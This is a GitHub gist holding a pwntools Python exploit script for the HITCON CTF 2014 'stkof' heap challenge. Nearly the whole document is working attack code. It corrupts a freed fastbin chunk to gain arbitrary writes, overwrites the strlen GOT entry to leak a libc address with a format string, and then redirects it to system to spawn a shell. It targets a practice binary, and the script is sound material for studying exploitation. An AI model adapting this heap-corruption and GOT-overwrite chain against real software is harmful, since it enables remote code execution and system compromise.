Skip to content

Instantly share code, notes, and snippets.

@icchy
Created Apr 28, 2017
Embed
What would you like to do?
HITCON CTF 2014 stkof
#!/usr/bin/env python
from pwn import *
context(os='linux', arch='amd64')
context.log_level = 'debug' # output verbose log
RHOST = "127.0.0.1"
RPORT = 10080
LHOST = "127.0.0.1"
LPORT = 10080
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./a679df07a8f3a8d590febad45336d031-stkof')
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
conn = None
if len(sys.argv) > 1:
if sys.argv[1] == 'r':
conn = remote(RHOST, RPORT)
elif sys.argv[1] == 'l':
conn = remote(LHOST, LPORT)
elif sys.argv[1] == 'd':
execute = """
# set environment LD_PRELOAD=
b *{0}
c
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./a679df07a8f3a8d590febad45336d031-stkof'], execute=execute)
conn.recvline()
else:
conn = process(['./a679df07a8f3a8d590febad45336d031-stkof'])
# conn = process(['./a679df07a8f3a8d590febad45336d031-stkof'], env={'LD_PRELOAD': ''})
# preparing for exploitation
log.info('Pwning')
def alloc(size):
conn.sendline("1")
conn.sendline(str(size))
res = conn.recvline()
if "FAIL" in res:
return -1
else:
conn.recvuntil("OK\n")
return int(res)
def read(idx, data):
conn.sendline("2")
conn.sendline(str(idx))
conn.sendline(str(len(data)))
conn.send(data)
res = conn.recvline()
if "FAIL" in res:
return False
elif "OK" in res:
return True
def free(idx):
conn.sendline("3")
conn.sendline(str(idx))
res = conn.recvline()
if "FAIL" in res:
return False
elif "OK" in res:
return True
for _ in range(0x20):
alloc(10)
free(2)
exploit = "A"*0x10 + "A"*8 + pack(0x21)+pack(0x602100-0x8)
read(1, exploit)
alloc(10) # fastbins unlink attack
idx = alloc(10) # 0x602100-0x8
pad = "A"*(0x602140 - 0x602108 + 0x8)
read(idx, pad+pack(elf.got['strlen']))
read(1, pack(elf.symbols['printf'])) # GOT overwrite
read(3, "%41$p\n\x00")
conn.sendline("4")
conn.sendline("3")
libc_start_main = int(conn.recvline(), 16)
libc_base = libc_start_main - (libc.symbols['__libc_start_main'] + 245)
libc_system = libc_base + libc.symbols['system']
log.info('libc_system: 0x{0:x}'.format(libc_system))
read(idx, pad+pack(elf.got['strlen']))
read(1, pack(libc_system)) # GOT overwrite
read(3, "sh;")
conn.sendline("4")
conn.sendline("3")
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment